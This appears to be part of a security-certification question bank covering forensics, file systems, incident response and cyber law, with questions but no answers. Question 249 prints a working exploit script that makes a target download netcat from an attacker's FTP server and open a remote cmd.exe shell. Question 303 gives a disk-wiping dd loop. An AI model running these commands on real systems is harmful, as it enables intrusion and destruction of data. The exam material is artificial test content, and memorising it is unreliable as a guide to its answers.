Question193: Which of the following is the initiative of United States Department of Justice, which provides state and local law enforcement agencies the tools to prevent Internet crimes against children, and catches the distributors of child pornography on the Internet?
Question194: Which of the following is a correct sequence of different layers of Open System Interconnection (OSI) model?
Question195: An organization wants to mitigate the risks associated with the lost or stolen laptops and the associated disclosure laws, while reporting data breaches. Which of the following solutions will be best for the organization?
Question196: Which of the following tables is formed by NTFS file system to keep the track of files, to store metadata, and their location?
Question197: Which of the following file systems provides file-level security?
Question198: SIMULATION
Fill in the blank with the appropriate name.
_____is a list, which specifies the order of volatility of data in a Windows based system.
Question199: The promiscuous mode is a configuration of a network card that makes the card pass all traffic it receives to the central processing unit rather than just packets addressed to it. Which of the following tools works by placing the host system network card into the promiscuous mode?
Question200: John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He enters the following command on the Linux terminal:
chmod -rwSr----- secure.c
Considering the above scenario, which of the following statements is true?
Question201: Which of the following types of cyber stalking damage the reputation of their victim and turn other people against them by setting up their own Websites, blogs or user pages for this purpose?
Question202: John works as a Network Administrator for DigiNet Inc. He wants to investigate failed logon attempts to a network. He uses Log Parser to detail out the failed logons over a specific time frame. He uses the following commands and query to list all failed logons on a specific date:
logparser.exe file:FailedLogons.sql -i:EVT -o:datagrid
SELECT
timegenerated AS LogonTime,
extract_token(strings, 0, '|') AS UserName
FROM Security
WHERE EventID IN (529;
530;
531;
532;
533;
534;
535;
537;
539)
AND to_string(timegenerated,'yyyy-MM-dd HH:mm:ss') like '2004-09%'
After investigation, John concludes that two logon attempts were made by using an expired account.
Which of the following EventID refers to this failed logon?
Question203: Which of the following file systems is designed by Sun Microsystems?
Question204: You work as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network.
You are working as a root user on the Linux operating system. While performing some security investigation, you want to see the hostname and IP address from where users logged in.
Which of the following commands will you use to accomplish the task?
Question205: Which of the following tools is a wireless sniffer and analyzer that works on the Windows operating system?
Question206: Mark works as a security manager for SofTech Inc. He is using a technique for monitoring what the employees are doing with corporate resources. Which of the following techniques is being used by Mark to gather evidence of an ongoing computer crime if a member of the staff is e-mailing company's secrets to an opponent?
Question207: Which of the following file attributes are not available on a FAT32 partition?
Each correct answer represents a complete solution. Choose two.
Question208: Which of the following are known as the three laws of OPSEC?
Each correct answer represents a part of the solution. Choose three.
Question209: Which of the following is a nonvolatile form of memory that can be reprogrammed by using a special programming device, and need not to be removed from the PC to be reprogrammed?
Question210: You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to allow direct access to the filesystems data structure. Which of the following Unix commands can you use to accomplish the task?
Question211: Which of the following tools are used for footprinting?
Each correct answer represents a complete solution. Choose all that apply.
Question212: Which of the following tools is used to restore deleted files from Linux and Mac OS X file system?
Question213: Which of the following cryptographic methods are used in EnCase to ensure the integrity of the data, which is acquired for the investigation?
Each correct answer represents a complete solution. Choose two.
Question214: SIMULATION
Fill in the blank with the appropriate file system.
Alternate Data Streams (ADS) is a feature of the_____ file system, which allows more than one data stream to be associated with a filename.
Question215: On which of the following locations does the Windows NT/2000 operating system contain the SAM, SAM.LOG, SECURITY.LOG, APPLICATION.LOG, and EVENT.LOG files?
Question216: Which of the following tools is used to block email, Instant Message, Web site, or other media if inappropriate words such as pornography, violence etc. is used?
Question217: Which of the following involves changing data prior to or during input to a computer in an effort to commit fraud?
Question218: Which of the following Windows Registry key contains the password file of the user?
Question219: Which of the following statements are true about routers?
Each correct answer represents a complete solution. Choose all that apply.
Question220: Which of the following directories contains administrative commands on a UNIX computer?
Question221: An executive in your company reports odd behavior on her PDA. After investigation you discover that a trusted device is actually copying data off the PDA. The executive tells you that the behavior started shortly after accepting an e-business card from an unknown person. What type of attack is this?
Question222: Which of the following modules of OS X kernel (XNU) provides the primary system program interface?
Question223: Which of the following switches of the XCOPY command copies attributes while copying files?
Question224: HOTSPOT
Identify the port in the image given below, which can be connected to the hub to extend the number of ports, and up to 127 devices can be connected to it?
Hot Area:

Question225: Adam works as a professional Computer Hacking Forensic Investigator. He has been assigned with a project to investigate a computer in the network of SecureEnet Inc. The compromised system runs on Windows operating system. Adam decides to use Helix Live for Windows to gather data and electronic evidences starting with retrieving volatile data and transferring it to server component via TCP/IP. Which of the following application software in Helix Windows Live will he use to retrieve volatile data and transfer it to the server component via TCP/IP?
Question226: Which of the following hardware devices prevents broadcasts from crossing over subnets?
Question227: Which of the following representatives of incident response team takes forensic backups of the systems that are the focus of the incident?
Question228: Which of the following Incident handling process phases is responsible for defining rules, collaborating human workforce, creating a back-up plan, and testing the plans for an enterprise?
Question229: Sarah has created a site on which she publishes a copyrighted material. She is ignorant that she is infringing copyright. Is she guilty under copyright laws?
Question230: You work as a Network Administrator for Blue Well Inc. Your company's network has a Windows 2000 server with the FAT file system. This server stores sensitive data. You want to encrypt this data to protect it from unauthorized access. You also have to accomplish the following goals:
Data should be encrypted and secure.

Administrative effort should be minimum.

You should have the ability to recover encrypted files in case the file owner leaves the company.

Other permissions on encrypted files should be unaffected.

File-level security is required on the disk where data is stored.

Encryption or decryption of files should not be the responsibility of the file owner.

You take the following steps to accomplish these goals:
Convert the FAT file system to NTFS file system.

Use third-party data encryption software.

What will happen after taking these steps?
Each correct answer represents a complete solution. Choose all that apply.
Question231: Which of the following laws enacted in United States makes it illegal for an Internet Service Provider (ISP) to allow child pornography to exist on Web sites?
Question232: Which of the following classes of hackers describes an individual who uses his computer knowledge for breaking security laws, invading privacy, and making information systems insecure?
Question233: Which of the following needs to be documented to preserve evidences for presentation in court?
Question234: Which of the following tools is used to extract human understandable interpretation from the computer binary files?
Question235: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate and examine drive image of a compromised system, which is suspected to be used in cyber crime. Adam uses Forensic Sorter to sort the contents of hard drive in different categories. Which of the following type of image formats is NOT supported by Forensic Sorter?
Question236: You work as a Network Administrator for Peach Tree Inc. The company currently has a FAT-based Windows NT network. All client computers run Windows 98. The management wants all client computers to be able to boot in Windows XP Professional. You want to accomplish the following goals:
The file system should support file compression and file level security.

All the existing data and files can be used by the new file system.

Users should be able to dual-boot their computers.

You take the following steps to accomplish these goals:
Convert the FAT file system to NTFS using the CONVERT utility.

Install Windows XP and choose to upgrade the existing operating system during setup.

Which of the following goals will you be able to accomplish?
Each correct answer represents a complete solution. Choose all that apply.
Question237: Which of the following type of files is NOT deleted by Disk Cleanup program of Windows XP?
Question238: Which of the following is the first computer virus that was used to infect the boot sector of storage media formatted with the DOS File Allocation Table (FAT) file system?
Question239: Which of the following statements about registry is true?
Each correct answer represents a complete solution. Choose three.
Question240: John, a novice web user, makes a new E-mail account and keeps his password as "apple", his favorite fruit. John's password is vulnerable to which of the following password cracking attacks?
Each correct answer represents a complete solution. Choose all that apply.
Question241: You are responsible for all computer security at your company. This includes initial investigation into alleged unauthorized activity. Which of the following are possible results of improperly gathering forensic evidence in an alleged computer crime by an employee?
Each correct answer represents a complete solution. Choose three.
Question242: Which of the following file systems is used by both CD and DVD?
Question243: John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He copies the whole structure of the We-are-secure Web site to the local disk and obtains all the files on the Web site. Which of the following techniques is he using to accomplish his task?
Question244: Which of the following is used to authenticate asymmetric keys?
Question245: You work as a Network Administrator for uCertify Inc. You want to edit the MSDOS.SYS file, in your computer, from the DOS prompt. You are unable to find the file. What is the most likely cause?
Question246: Adam works as a professional Computer Hacking Forensic Investigator. He has been called by the FBI to examine data of the hard disk, which is seized from the house of a suspected terrorist. Adam decided to acquire an image of the suspected hard drive. He uses a forensic hardware tool, which is capable of capturing data from IDE, Serial ATA, SCSI devices, and flash cards. This tool can also produce MD5 and CRC32 hash while capturing the data. Which of the following tools is Adam using?
Question247: Which of the following log files are used to collect evidences before taking the bit-stream image of the BlackBerry?
Each correct answer represents a complete solution. Choose all that apply.
Question248: John works as a professional Ethical Hacker. He has been assigned the task of testing the security of www.we-are-secure.com. He has performed the footprinting step and now he has enough information to begin scanning in order to detect active computers. He sends a ping request to a computer using ICMP type 13. What kind of ICMP message is John using to send the ICMP ping request message?
Question249: Adam, a malicious hacker performs an exploit, which is given below:
#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '[email protected]';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl
msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C
\"echo get hacked.
html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print
"Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?
Question250: Mark works as a Network administrator for SecureEnet Inc. His system runs on Mac OS X.
He wants to boot his system from the Network Interface Controller (NIC). Which of the following snag keys will Mark use to perform the required function?
Question251: Which of the following precautionary steps are taken by the supervisors or employers to avoid sexual harassment in workplace?
Each correct answer represents a complete solution. Choose all that apply.
Question252: You want to retrieve information whether your system is in promiscuous mode or not. Which of the following commands will you use?
Each correct answer represents a complete solution. Choose all that apply.
Question253: You are the Security Consultant working with a client who uses a lot of outdated systems. Many of their clients PC's still have Windows 98. You are concerned about the security of passwords on a Windows 98 machine. What algorithm is used in Windows 98 to hash passwords?
Question254: You company suspects an employee of sending unauthorized emails to competitors. These emails are alleged to contain confidential company data. Which of the following is the most important step for you to take in preserving the chain of custody?
Question255: Which of the following is the correct order of loading system files into the main memory of the system, when the computer is running on Microsoft's Windows XP operating system?
Question256: A customer comes to you stating that his hard drive has crashed. He had backed up the hard drive, but some files on it were encrypted with Windows Encrypted File System (EFS). What do you need to do to be able to give him access to those restored encrypted files?
Question257: John works as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. John is working as a root user on the Linux operating system. He wants to forward all the kernel messages to the remote host having IP address 192.168.0.1. Which of the following changes will he perform in the syslog.conf file to accomplish the task?
Question258: You work as a professional Computer Hacking Forensic Investigator for DataEnet Inc. You want to investigate e-mail information of an employee of the company. The suspected employee is using an online e-mail system such as Hotmail or Yahoo. Which of the following folders on the local computer will you review to accomplish the task?
Each correct answer represents a complete solution. Choose all that apply.
Question259: Which of the following functionality within the Autopsy browser is specifically designed to aid in case management?
Question260: You work as a Network Administrator for Perfect Solutions Inc. You have to install Windows 2000 on a computer that will work as a file server. You have to format the hard disk of the computer, using a file system that supports encryption. Which of the following file systems will you use to accomplish this?
Question261: Trinity wants to send an email to her friend. She uses the MD5 generator to calculate cryptographic hash of her email to ensure the security and integrity of the email. MD5 generator, which Trinity is using operates in two steps:
Creates check file

Verifies the check file

Which of the following MD5 generators is Trinity using?
Question262: Which of the following encryption methods use the RC4 technology?
Each correct answer represents a complete solution. Choose all that apply.
Question263: You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network.
You are configuring a wireless LAN on the network. You experience interference on your network. Through investigation, you come to know that three foreign WAPs are within the range of your LAN. Although they have different SSIDs than yours, they are working on the same channel as yours.
Which of the following steps will you take to reduce the interference?
Question264: Which of the following tools is an asterisk password revealer tool?
Question265: Which of the following tools can be used to perform a whois query?
Each correct answer represents a complete solution. Choose all that apply.
Question266: What is the name of the Secondary IDE slave, fourth partition in Linux operating system according to the Linux naming convention?
Question267: Sandra, an expert computer user, hears five beeps while booting her computer that has AMI BIOS; and after that her computer stops responding. Sandra knows that during booting process POST produces different beep codes for different types of errors. Which of the following errors refers to this POST beep code?
Question268: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate the main server of SecureEnet Inc. The server runs on Debian Linux operating system.
Adam wants to investigate and review the GRUB configuration file of the server system.
Which of the following files will Adam investigate to accomplish the task?
Question269: Adam, a malicious hacker, hides a hacking tool from a system administrator of his company by using Alternate Data Streams (ADS) feature. Which of the following statements is true in context with the above scenario?
Question270: Which of the following tools is used to modify registry permissions in Windows?
Question271: Which utility enables you to access files from a Windows .CAB file?
Question272: Which of the following is a formula, practice, process, design, instrument, pattern, or compilation of information which is not generally known, but by which a business can obtain an economic advantage over its competitors?
Question273: Adam works as a professional Penetration tester. A project has been assigned to him to employ penetration testing on the network of Umbrella Inc. He is running the test from home and had downloaded every security scanner from the Internet. Despite knowing the IP range of all of the systems, and the exact network configuration, Adam is unable to get any useful results.
Which of the following is the most like cause of this problem?
Each correct answer represents a complete solution. Choose all that apply.
Question274: Which of the following can be monitored by using the host intrusion detection system (HIDS)?
Each correct answer represents a complete solution. Choose two.
Question275: Peter, an expert computer user, attached a new sound card to his computer. He then restarts the computer, so that the BIOS can scan the hardware changes. What will be the memory range of ROM that the BIOS scan for additional code to be executed for proper working of soundcard?
Question276: Which of the following registry hives stores configuration information specific to a particular user who is currently logged on to the computer?
Question277: Which of the following types of computers is used for attracting potential intruders?
Question278: Which of the following is used to detect the bad sectors in a hard disk under Linux environment?
Question279: Nathan works as a professional Ethical Hacker. He wants to see all open TCP/IP and UDP ports of his computer. Nathan uses the netstat command for this purpose but he is still unable to map open ports to the running process with PID, process name, and path. Which of the following commands will Nathan use to accomplish the task?
Question280: Peter works as a Security Administrator for SecureEnet Inc. He observes that the database server of the company has been compromised and the data is stolen. Peter immediately wants to report this crime to the law enforcement authorities. Which of the following organizations looks after the computer crimes investigations in the United States?
Question281: Which of the following statements best describes the consequences of the disaster recovery plan test?
Question282: Which of the following switches of the XCOPY command copies file ownerships and NTFS permissions on files while copying the files?
Question283: John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He receives the following e-mail:

The e-mail that John has received is an example of __________.
Question284: You work as a Network Administrator for Net Perfect Inc. The company has a Windows Server 2008 network environment. The network is configured as a Windows Active Directory-based single forest single domain network. The network is configured on IP version 6 protocol. All the computers on the network are connected to a switch device. One day, users complain that they are unable to connect to a file server. You try to ping the client computers from the server, but the pinging fails. You try to ping the server's own loopback address, but it fails to ping. You restart the server, but the problem persists.
What is the most likely cause?
Question285: Which of the following types of attacks cannot be prevented by technical measures only?
Question286: Which of the following articles defines illegal access to the computer or network in Chapter 2 of Section 1, i.e., Substantive criminal law of the Convention on Cybercrime passed by the Council of Europe?
Question287: John works as a professional Ethical Hacker. He has been assigned a project for testing the security of www.we-are-secure.com. He wants to corrupt an IDS signature database so that performing attacks on the server is made easy and he can observe the flaws in the We-are-secure server. To perform his task, he first of all sends a virus that continuously changes its signature to avoid detection from IDS. Since the new signature of the virus does not match the old signature, which is entered in the IDS signature database, IDS becomes unable to point out the malicious virus. Which of the following IDS evasion attacks is John performing?
Question288: An organization monitors the hard disks of its employees' computers from time to time. Which policy does this pertain to?
Question289: Which of the following is a name, symbol, or slogan with which a product is identified?
Question290: You want to perform passive footprinting against we-are-secure Inc. Web server. Which of the following tools will you use?
Question291: Which of the following tools can be used to perform tasks such as Windows password cracking, Windows enumeration, and VoIP session sniffing?
Question292: On your dual booting computer, you want to set Windows 98 as the default operating system at startup. In which file will you define this?
Question293: TCP FIN scanning is a type of stealth scanning through which the attacker sends a FIN packet to the target port. If the port is closed, the victim assumes that this packet was sent mistakenly by the attacker and sends the RST packet to the attacker. If the port is open, the FIN packet will be ignored and the port will drop the packet. Which of the following operating systems can be easily identified with the help of TCP FIN scanning?
Question294: Which of the following laws or acts, formed in Australia, enforces prohibition against cyber stalking?
Question295: In the United States, Title VII of the 1964 Civil Rights Act was formulated to protect an employee from discrimination on the basis of religion, color, race, national origin, and sex. This law makes discrimination in employment illegal. Which of the following was the original emphasis of the Act?
Question296: John works as a professional Ethical Hacker. He is assigned a project to test the security of www.weare- secure.com. He enters a single quote in the input field of the login page of the We-are-secure Web site and receives the following error message:
Microsoft OLE DB Provider for ODBC Drivers error '0x80040E14'
This error message shows that the We-are-secure Website is vulnerable to __________.
Question297: Which of the following methods can be used to start the Disk Defragmenter utility in Windows 9x?
Each correct answer represents a complete solution. Choose two.
Question298: Victor is a novice Ethical Hacker. He is learning the hacking process, i.e., the steps taken by malicious hackers to perform hacking. Which of the following steps is NOT included in the hacking process?
Question299: John works as a professional Ethical Hacker. He is assigned a project to test the security of www.weare- secure.com. He is working on the Linux operating system. He wants to sniff the we-are-secure network and intercept a conversation between two employees of the company through session hijacking. Which of the following tools will John use to accomplish the task?
Question300: John works for an Internet Service Provider (ISP) in the United States. He discovered child pornography material on a Web site hosted by the ISP. John immediately informed law enforcement authorities about this issue. Under which of the following Acts is John bound to take such an action?
Question301: You are reviewing a Service Level Agreement between your company and a Web development vendor.
Which of the following are security requirements you should look for in this SLA?
Each correct answer represents a complete solution. Choose all that apply.
Question302: What is the name of the group of blocks which contains information used by the operating system in Linux system?
Question303: Adam, a malicious hacker has successfully gained unauthorized access to the Linux system of Umbrella Inc. Web server of the company runs on Apache. He has downloaded sensitive documents and database files from the computer. After performing these malicious tasks, Adam finally runs the following command on the Linux command box before disconnecting. for (( i = 0;i<11;i++ )); do dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda done
Which of the following actions does Adam want to perform by the above command?
Question304: Which of the following is a type of intruder detection that involves logging network events to a file for an administrator to review later?
Question305: Which of the following file systems supports disk quotas?
Question306: Which of the following is used to back up forensic evidences or data folders from the network or locally attached hard disk drives?
Question307: Which of the following directories cannot be placed out of the root filesystem?
Each correct answer represents a complete solution. Choose all that apply.